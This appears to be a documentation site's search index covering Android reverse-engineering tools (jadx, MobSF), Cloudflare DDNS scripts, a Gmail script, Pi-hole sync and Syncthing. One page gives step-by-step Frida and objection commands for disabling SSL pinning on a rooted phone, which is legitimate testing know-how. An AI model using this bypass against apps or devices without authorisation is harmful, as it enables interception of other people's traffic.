deobfuscator included jadx-gui features:
view decompiled code with highlighted syntax jump to declaration find usage full text search smali debugger, check wiki page for setup and usage Jadx-gui key bindings can be found here
See these features in action here: jadx-gui features overview
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#download", "title": "Download", "text": " release from github: latest unstable build After download unpack zip file go to bin
directory and run: - jadx
- command line version - jadx-gui
- UI version
On Windows run .bat
files with double-click\\ Note: ensure you have installed Java 11 or later 64-bit version. For Windows, you can download it from oracle.com (select x64 Installer).
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#installation", "title": "Installation", "text": " Arch linux sudo pacman -S jadx\n
macOS brew install jadx\n
Flathub flatpak install flathub com.github.skylot.jadx\n
", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#usage", "title": "Usage", "text": "
jadx[-gui] [command] [options] <input files> (.apk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab)\ncommands (use '<command> --help' for command options):\n plugins - manage jadx plugins\n\noptions:\n -d, --output-dir - output directory\n -ds, --output-dir-src - output directory for sources\n -dr, --output-dir-res - output directory for resources\n -r, --no-res - do not decode resources\n -s, --no-src - do not decompile source code\n --single-class - decompile a single class, full name, raw or alias\n --single-class-output - file or dir for write if decompile a single class\n --output-format - can be 'java' or 'json', default: java\n -e, --export-gradle - save as android gradle project\n -j, --threads-count - processing threads count, default: 4\n -m, --decompilation-mode - code output mode:\n 'auto' - trying best options (default)\n 'restructure' - restore code structure (normal java code)\n 'simple' - simplified instructions (linear, with goto's)\n 'fallback' - raw instructions without modifications\n --show-bad-code - show inconsistent code (incorrectly decompiled)\n --no-imports - disable use of imports, always write entire package name\n --no-debug-info - disable debug info parsing and processing\n --add-debug-lines - add comments with debug line numbers if available\n --no-inline-anonymous - disable anonymous classes inline\n --no-inline-methods - disable methods inline\n --no-move-inner-classes - disable move inner classes into parent\n --no-inline-kotlin-lambda - disable inline for Kotlin lambdas\n --no-finally - don't extract finally block\n --no-replace-consts - don't replace constant value with matching constant field\n --escape-unicode - escape non latin characters in strings (with \\u)\n --respect-bytecode-access-modifiers - don't change original access modifiers\n --mappings-path - deobfuscation mappings file or directory. Allowed formats: Tiny and Tiny v2 (both '.tiny'), Enigma (.mapping) or Enigma directory\n --mappings-mode - set mode for handling the deobfuscation mapping file:\n 'read' - just read, user can always save manually (default)\n 'read-and-autosave-every-change' - read and autosave after every change\n 'read-and-autosave-before-closing' - read and autosave before exiting the app or closing the project\n 'ignore' - don't read or save (can be used to skip loading mapping files referenced in the project file)\n --deobf - activate deobfuscation\n --deobf-min - min length of name, renamed if shorter, default: 3\n --deobf-max - max length of name, renamed if longer, default: 64\n --deobf-whitelist - space separated list of classes (full name) and packages (ends with '.*') to exclude from deobfuscation, default: android.support.v4.* android.support.v7.* android.support.v4.os.* android.support.annotation.Px androidx.core.os.* androidx.annotation.Px\n --deobf-cfg-file - deobfuscation mappings file used for JADX auto-generated names (in the JOBF file format), default: same dir and name as input file with '.jobf' extension\n --deobf-cfg-file-mode - set mode for handling the JADX auto-generated names' deobfuscation map file:\n 'read' - read if found, don't save (default)\n 'read-or-save' - read if found, save otherwise (don't overwrite)\n 'overwrite' - don't read, always save\n 'ignore' - don't read and don't save\n --deobf-use-sourcename - use source file name as class name alias\n --deobf-res-name-source - better name source for resources:\n 'auto' - automatically select best name (default)\n 'resources' - use resources names\n 'code' - use R class fields names\n --use-kotlin-methods-for-var-names - use kotlin intrinsic methods to rename variables, values: disable, apply, apply-and-hide, default: apply\n --rename-flags - fix options (comma-separated list of):\n 'case' - fix case sensitivity issues (according to --fs-case-sensitive option),\n 'valid' - rename java identifiers to make them valid,\n 'printable' - remove non-printable chars from identifiers,\n or single 'none' - to disable all renames\n or single 'all' - to enable all (default)\n --integer-format - how integers are displayed:\n 'auto' - automatically select (default)\n 'decimal' - use decimal\n 'hexadecimal' - use hexadecimal\n --fs-case-sensitive - treat filesystem as case sensitive, false by default\n --cfg - save methods control flow graph to dot file\n --raw-cfg - save methods control flow graph (use raw instructions)\n -f, --fallback - set '--decompilation-mode' to 'fallback' (deprecated)\n --use-dx - use dx/d8 to convert java bytecode\n --comments-level - set code comments level, values: error, warn, info, debug, user-only, none, default: info\n --log-level - set log level, values: quiet, progress, error, warn, info, debug, default: progress\n -v, --verbose - verbose output (set --log-level to DEBUG)\n -q, --quiet - turn off output (set --log-level to QUIET)\n --version - print jadx version\n -h, --help - print this help\n\nPlugin options (-P<name>=<value>):\n 1) dex-input: Load .dex and .apk files\n - dex-input.verify-checksum - verify dex file checksum before load, values: [yes, no], default: yes\n 2) java-convert: Convert .class, .jar and .aar files to dex\n - java-convert.mode - convert mode, values: [dx, d8, both], default: both\n - java-convert.d8-desugar - use desugar in d8, values: [yes, no], default: no\n 3) kotlin-metadata: Use kotlin.Metadata annotation for code generation\n - kotlin-metadata.class-alias - rename class alias, values: [yes, no], default: yes\n - kotlin-metadata.method-args - rename function arguments, values: [yes, no], default: yes\n - kotlin-metadata.fields - rename fields, values: [yes, no], default: yes\n - kotlin-metadata.companion - rename companion object, values: [yes, no], default: yes\n - kotlin-metadata.data-class - add data class modifier, values: [yes, no], default: yes\n - kotlin-metadata.to-string - rename fields using toString, values: [yes, no], default: yes\n - kotlin-metadata.getters - rename simple getters to field names, values: [yes, no], default: yes\n 4) rename-mappings: various mappings support\n - rename-mappings.format - mapping format, values: [auto, TINY, TINY_2, ENIGMA, ENIGMA_DIR, MCP, SRG, TSRG, TSRG2, PROGUARD], default: auto\n - rename-mappings.invert - invert mapping, values: [yes, no], default: no\n\nEnvironment variables:\n JADX_DISABLE_ZIP_SECURITY - set to 'true' to disable all security checks for zip files\n JADX_ZIP_MAX_ENTRIES_COUNT - maximum allowed number of entries in zip files (default: 100 000)\n JADX_TMP_DIR - custom temp directory, using system by default\n\nExamples:\n jadx -d out classes.dex\n jadx --rename-flags \"none\" classes.dex\n jadx --rename-flags \"valid, printable\" classes.dex\n jadx --log-level ERROR app.apk\n jadx -Pdex-input.verify-checksum=no app.apk\n
These options also worked on jadx-gui running from command line and override options from preferences dialog", "tags": ["android", "decompiler", "java"]}, {"location": "android/jadx-decompiler/#use-jadx-as-a-library", "title": "Use jadx as a Library", "text": "You can use jadx in your java projects, check details on wiki page
", "tags": ["android", "decompiler", "java"]}, {"location": "android/mobsf/", "title": "Mobile Security Framework (MobSF)", "text": "Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK, XAPK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.
Follow the projet at github: MobSF/Mobile-Security-Framework-MobSF
", "tags": ["android", "penetration-testing"]}, {"location": "android/mobsf/#running-mobsf-as-docker", "title": "Running MobSF as Docker", "text": "Below is a docker run
command for running MobSF as a Docker container.
docker run \\\n-d \\\n-it \\\n-v /root/tools/mobSF:/root/.MobSF \\\n-h mobsf \\\n--name mobsf \\\n--restart always \\\n-p 8005:8000 \\\nopensecurity/mobile-security-framework-mobsf:latest\n
docker compose example for docker-compose.yml
:
version: '2.4'\n\nservices:\nmobsf:\nimage: opensecurity/mobile-security-framework-mobsf\ncontainer_name: mobsf\nhostname: mobsf\nrestart: always\nnetwork_mode: bridge\nvolumes:\n- ./:/root/.MobSF\n- /etc/localtime:/etc/localtime\nports:\n- '1337:1337'\n- '8000:8000'\n
", "tags": ["android", "penetration-testing"]}, {"location": "android/ssl-pinning-bypass/", "title": "Android SSL Pinning Bypass with Frida", "text": "", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#whats-ssl-pinning", "title": "Whats SSL Pinning?", "text": "Android app establishes an HTTPS connection, it checks the issuer of the server's certificate against the internal list of trusted Android system certificate authorities to make sure it is communicating with a trusted server. This is called SSL Pinning. If the server's certificate is not in the list of trusted certificates, the app won't be able to communicate with the server.
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#whats-frida", "title": "Whats Frida?", "text": "Frida is dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It is a powerful tool that allows you to modify Android applications and libraries without having to recompile them.
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#requirements", "title": "Requirements", "text": " Rooted Adnroid Phone Python 3 pip(pip3) ", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#installation", "title": "Installation", "text": "Install Frida framework, objection to your host os.
pip install frida-tools\npip install objection\n
Download the proper version from: Frida Server Downloads
Danger
Make sure to download the proper version of Frida Server for your Android cpu architecture. Alwasys use the latest version of Frida Server and frida-tools
Extract and rename the file to frida-server Move the file to the Adnroid Phone to /data/local/tmp/
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#usage", "title": "Usage", "text": "Connect to adb shell to the android device
For more inforatmati
adb shell\n
Change user to Root
su\n
Make sure you are running as root with the folowing command:
whoami\n
Change permissions to the /data/local/tmp/frida-server to be able to run the server
chmod 755 /data/local/tmp/frida-server\n
Run the Frida Server in background:
/data/local/tmp/frida-server\n
Warning
Do no close the terminal - this will stop the Frida Server
Go Back to host's terminal List all the Applications and find the name of the desired application you want to by bypass SSL Pinning
frida-ps -Ua\n
Now Run with the name of the application
objection -g c**********n explore -q\n
Now remove the SSL Pining with
android sslpinning disable\n
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "android/ssl-pinning-bypass/#set-proxy-for-applciation-with-frida-and-objection", "title": "Set Proxy for Applciation with frida and objection", "text": "android proxy set 192.168.5.102 8081\n
", "tags": ["android", "frida", "ssl-pinning"]}, {"location": "automation/ddns-cloudflare-bash/", "title": "DDNS Cloudflare Bash Script", "text": "When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare Bash script is a simple bash script that allows you to easily update your Cloudflare's DNS records
dinamically regardless of your current IP address. DDNS Cloudflare Bash Script can be used on Linux, Unix, FreeBSD, and macOS with only one requirment of curl
Source code can be found at DDNS Cloudflare Bash Github Repository.
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#about", "title": "About", "text": " DDNS Cloudflare Bash Script for most Linux, Unix distributions and MacOS. Choose any source IP address to update external or internal (WAN/LAN). For multiply lan interfaces like Wifi, Docker Networks and Bridges the script will automatically detects the primary Interface by priority. Cloudflare's options proxy and TTL configurable via the config file. Optional Telegram Notifications ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#requirements", "title": "Requirements", "text": " curl Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#creating-cloudflare-api-token", "title": "Creating Cloudflare API Token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#installation", "title": "Installation", "text": "You can place the script at any location manually.
MacOS: Don't use the /usr/local/bin/ for the script location. Create a separate folder under your user path /Users/${USER}
The automatic install examples below will place the script at /usr/local/bin/
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.sh\nsudo chmod +x update-cloudflare-dns.sh\nsudo mv update-cloudflare-dns.sh /usr/local/bin/update-cloudflare-dns\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#config-file", "title": "Config file", "text": "You can use default config file update-cloudflare-dns.conf or pass your own config file as parameter to script.
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.conf\n
Place the config file in the directory as the update-cloudflare-dns for above example at /usr/local/bin/
sudo mv update-cloudflare-dns.conf /usr/local/bin/update-cloudflare-dns.conf\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#config-parameters", "title": "Config Parameters", "text": "Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated, you can pass multiple A records separated by comma cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#optional-notifications-parameters", "title": "Optional Notifications Parameters", "text": "Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#running-the-script", "title": "Running The Script", "text": "When placed in /usr/local/bin/
update-cloudflare-dns\n
With your config file (need to be placed in same folder)
update-cloudflare-dns yoru_config.conf\n
Or manually
<path>/.update-cloudflare-dns.sh\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#automation-with-crontab", "title": "Automation With Crontab", "text": "You can run the script via crontab
crontab -e\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#examples", "title": "Examples", "text": "Run every minute
* * * * * /usr/local/bin/update-cloudflare-dns\n
Run with your specific config file
* * * * * /usr/local/bin/update-cloudflare-dns myconfig.conf\n
Run every 2 minutes
*/2 * * * * /usr/local/bin/update-cloudflare-dns\n
Run at boot
@reboot /usr/local/bin/update-cloudflare-dns\n
Run 1 minute after boot
@reboot sleep 60 && /usr/local/bin/update-cloudflare-dns\n
Run at 08:00
0 8 * * * /usr/local/bin/update-cloudflare-dns\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#logs", "title": "Logs", "text": "This Script will create a log file with only the last run information Log file will be located at the script's location.
Example:
/usr/local/bin/update-cloudflare-dns.log\n
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#limitations", "title": "Limitations", "text": "", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#license", "title": "License", "text": "", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-bash/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["automation", "cloudflare", "ddns", "bash"]}, {"location": "automation/ddns-cloudflare-powershell/", "title": "DDNS Cloudflare PowerShell Script", "text": "When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare PowerShell script is a simple PowerShell script that allows you to easily update your Cloudflare's DNS records
dinamically regardless of your current IP address. DDNS Cloudflare PowerShell Script can be used on Windows operating systems without any requirements for PowerShell.
Source code can be found at DDNS Cloudflare PowerShell Github Repository.
DDNS Cloudflare PowerShell script for Windows. Choose any source IP address to update external or internal (WAN/LAN). For multiple LAN interfaces like Wifi, Docker Networks and Bridges the script will automatically detect the primary Interface by priority. Cloudflare's options for proxy and TTL configurable via the parameters. Optional Telegram or Discord Notifications ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#requirements", "title": "Requirements", "text": " Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Enabled running unsigned PowerShell ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#creating-cloudflare-api-token", "title": "Creating Cloudflare API Token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#installation", "title": "Installation", "text": "Download the DDNS-Cloudflare-PowerShell zip file & Unzip, rename the folder to DDNS-Cloudflare-PowerShell place in a directory of your choosing
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#config-parameters", "title": "Config Parameters", "text": "Update the config parameters inside the update-cloudflare-dns_conf.ps1 by editing accordingly. See below for examples.
Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#optional-notifications-parameters-for-telegram", "title": "Optional Notifications Parameters for Telegram", "text": "Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#optional-notification-parameters-for-discord", "title": "Optional Notification Parameters for Discord", "text": "Option Example Description notify_me_discord yes Use Discord notifications yes/no discord_webhook_URL http://WebhookURL.com/asd/ Webhook URL from your Discord server settings To generate a webhook URL, follow the official Discord instructions.
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#running-the-script", "title": "Running The Script", "text": "Open cmd/powershell
Example:
powershell.exe -ExecutionPolicy Bypass -File C:\\DDNS-Cloudflare-PowerShell\\update-cloudflare-dns.ps1\n
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#automation-with-windows-task-scheduler", "title": "Automation With Windows Task Scheduler", "text": "Example: Run at boot with 1 min delay and repeat every 1 min
Open Task Scheduler Action -> Crate Task General Menu Name: update-cloudflare-dns Run whether user is logged on or not Trigger New... Begin the task: At startup Delay task for: 1 minute Repeat task every: 1 minute for duration of: indefinitely Enabled Actions New... Action: Start a Program Program/script: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Add arguments: -ExecutionPolicy Bypass -File C:\\DDNS-Cloudflare-PowerShell\\update-cloudflare-dns.ps1 ok Enter your user's password when prompted Conditions Power: Uncheck - [x] Start the task only if the computer is on AC power ", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#logs", "title": "Logs", "text": "This Script will create a log file with only the last run information Log file will be located as same directory as update-cloudflare-dns.ps1
Log file name:
update-cloudflare-dns.log\n
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#license", "title": "License", "text": "", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/ddns-cloudflare-powershell/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["automation", "cloudflare", "ddns", "powershell"]}, {"location": "automation/gmail-mark-archived-mail-as-read/", "title": "Automatically Mark Archived Email as Read in Gmail", "text": "", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#background", "title": "Background", "text": "My preferred method of managing emails in Gmail is Zero Inbox
. In short, emails in Inbox work as to-do list. The Inbox may contain important email i need to attend or a digital receipt from a payment I've made a minute ago. Since I know the content of that email the task is done and I archive it. This email will move from Inbox to All Mail or a dedicated label if you have automation rules.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#the-problem", "title": "The Problem", "text": "When using the Archive
function email which weren't opened or marked as Read
will show as number counter in All Mail or Dedicated Label. Since I'm done with those emails I have to manually mark emails as read. This is a tedious task and I don't want to do it manually
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#the-solution", "title": "The Solution", "text": "Using Google Scripts We can create a personal app
that will automatically mark emails as read when they are archived. This is a simple script that will run on Gmail and will mark emails as read when they are no longer in the inbox folder. You can choose how often you want to automatically mark archived email as read in gmail. This solution was tested on personal Gmail accounts and the Google Workspace Gmail accounts (as long you can grunt permission).
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#installation", "title": "Installation", "text": "Make sure you are logged in to your Google account. Open Google Scripts and create a new project.
You will be prompted with a new windwos. Rename the project to Automatically Mark Archived Email as Read
. Copy and repace the following code to the new project.
function markArchivedAsRead() {\nvar threads = GmailApp.search('label:unread -label:inbox', 0, 100);\nGmailApp.markThreadsRead(threads);\nvar spamThreads = GmailApp.search('label:spam -label:inbox', 0, 100);\nGmailApp.markThreadsRead(spamThreads);\n}\n
Your windwos should look like this:
Save the project.
After saving the project you should be able Run the script.
On the first run the script will ask you to give it the necessary permissions. Click Review permissions
to continue.
Since the app
is not signed you will be prompted with a warning. I's ok and safe. Click Advanced
.
Click Go to Gmail Mark Archived as Read (unsafe)
to continue.
At this point you will be prompted to grant the script Automatically Mark Archived Email as Read
access to your Gmail account. Click Allow
. This will alow the script to perform the actions you need.
If all went well you should see the log of the script as show bellow.
At this point we create a Automatically Mark Archived Email as Read
script and grunt it the necessary permissions. NNow we want to automate the process. We can do this by creating a new timed trigger. Head over the Trigger menu
Click Add Trigger
.
You will be prompted to select when and how the script will run. The following example will run the script every 5 minutes, and send a failure email report onece a week.
Note
The script may fail onces in a while. This is due to the fact it depends on Gmail's API. Unless you receive an email with hunders of failed attempts, you can ignore the email.
Note
Update: Some people are reporting an error which says \"This operation can only be applied to at most 100 threads. (line 3, file \"Code\")\". To fix this, you have to manually do a search for \"is:unread\" and mark all of them as read before running the script, so that it starts with a clean slate. The script can only process 100 threads per run, so if you give it more than 100 on the first run,
After creating the trigger you screen should look like this:
Now we whant to ensure that the script runs every 5 minutes. We can do this in Execution
menu:
When 5 minutes passed from the point the trigger was created, the page log should look like this:
We are done with the installation and the configuration. You should already be able to see that some of the emails are marked as read.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#limitations", "title": "Limitations", "text": "Google's API is limited to 100 threads per request - a single script's run. This means that every 5 minutes it runs it will mark 100 emails as read. Since the script is run every 5 minutes, it won't take long to mark all emails as read automatically. If you aren't able to wait you can do it mark emails as read manually.
", "tags": []}, {"location": "automation/gmail-mark-archived-mail-as-read/#troubleshooting", "title": "Troubleshooting", "text": "I've seen this script working without any issues for months, But suddenly you may receive an email with the Automatically Mark Archived Email as Read
failing to run all the time. The reason is that the script lost
the Gmail permissions. The solution is to run the script manually and grant the script the necessary permissions as the first time.
", "tags": []}, {"location": "automation/pihole-cloudflare-dns-sync/", "title": "Pi-hole Cloudflare DNS Sync", "text": "Pihole Cloudflare DNS Sync Github Repository. Pihole Cloudflare DNS Sync Docker Hub Page.
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#description", "title": "Description", "text": "Lightweight Container image based on python:3.9.13-alpine to be used in conjunction with a Pi-hole instance to sync the DNS records from Cloudflare DNS Service to Pi-hole local DNS.
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#supports", "title": "Supports", "text": " A records CNAME records Any type of Pi-hole instance ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#requirements", "title": "Requirements", "text": " Cloudflare API Readonly Token Pi-hole instance ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#creating-a-cloudflare-api-token", "title": "Creating a Cloudflare API token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Read Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container ", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#parameters", "title": "Parameters", "text": "Parameter Description Default Type Required CLOUDFLARE_API_TOKEN Cloudflare API Token change_me string Yes CLOUDFLARE_DOMAIN Cloudflare Domain example.com string Yes EXCLUDE_PROXIED_RECORDS Exclude Proxied Records yes string Yes PIHOLE_HOST Pi-hole hostname/IP 123.123.123.123 string Yes PIHOLE_PORT Pi-hole port 80 integer Yes USE_HTTPS http/https for pihole no string Yes PIHOLE_PASSWORD Pi-hole password change_me string Yes RUN_EVERY Run very x minute 5 integer Yes", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#usage", "title": "Usage", "text": "Docker run example:
docker run -d \\\n--name pihole-cloudflare-dns-sync \\\n-h pihole-cloudflare-dns-sync \\\n--restart always \\\n-v /etc/timezone:/etc/timezone:ro \\\n-v /etc/localtime:/etc/localtime:ro \\\n-e CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token \\\n-e CLOUDFLARE_DOMAIN=example.com \\\n-e EXCLUDE_PROXIED_RECORDS=yes \\\n-e PIHOLE_HOST=123.123.123.123 \\\n-e PIHOLE_PORT=80 \\\n-e USE_HTTPS=no \\\n-e PIHOLE_PASSWORD=secret \\\n-e RUN_EVERY=1 \\\n-e PUID=1000 \\\n-e PGID=1000 \\\nfire1ce/pihole-cloudflare-dns-sync\n
Docker compose example:
version: '3'\n\nservices:\n pihole-cloudflare-dns-sync:\n image: fire1ce/pihole-cloudflare-dns-sync\n container_name: pihole-cloudflare-dns-sync\n hostname: pihole-cloudflare-dns-sync\n restart: always\n network_mode: bridge\n volumes:\n - /etc/timezone:/etc/timezone:ro\n - /etc/localtime:/etc/localtime:ro\n environment:\n - CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token\n - CLOUDFLARE_DOMAIN=example.com\n - EXCLUDE_PROXIED_RECORDS=yes\n - PIHOLE_HOST=123.123.123.123\n - PIHOLE_PORT=80\n - USE_HTTPS=no\n - PIHOLE_PASSWORD=secret\n - RUN_EVERY=1\n - PUID=1000\n - PGID=1000\n
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/pihole-cloudflare-dns-sync/#license", "title": "License", "text": "This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details
", "tags": ["pi-hole", "docker", "dns", "cloudflare"]}, {"location": "automation/syncthings/", "title": "Syncthing", "text": "Syncthing is a continuous file synchronization program. Syncthing is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices.
Official website: syncthing.net
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#debianubuntu-installation", "title": "Debian/Ubuntu Installation", "text": "We need to add the following Syncthing
repository to the system.
First, we need to add PGP keys to allow the system to check the packages authenticity
sudo curl -s -o /usr/share/keyrings/syncthing-archive-keyring.gpg https://syncthing.net/release-key.gpg\n
Then we will add the stable Syncthing
repository channel to your APT sources
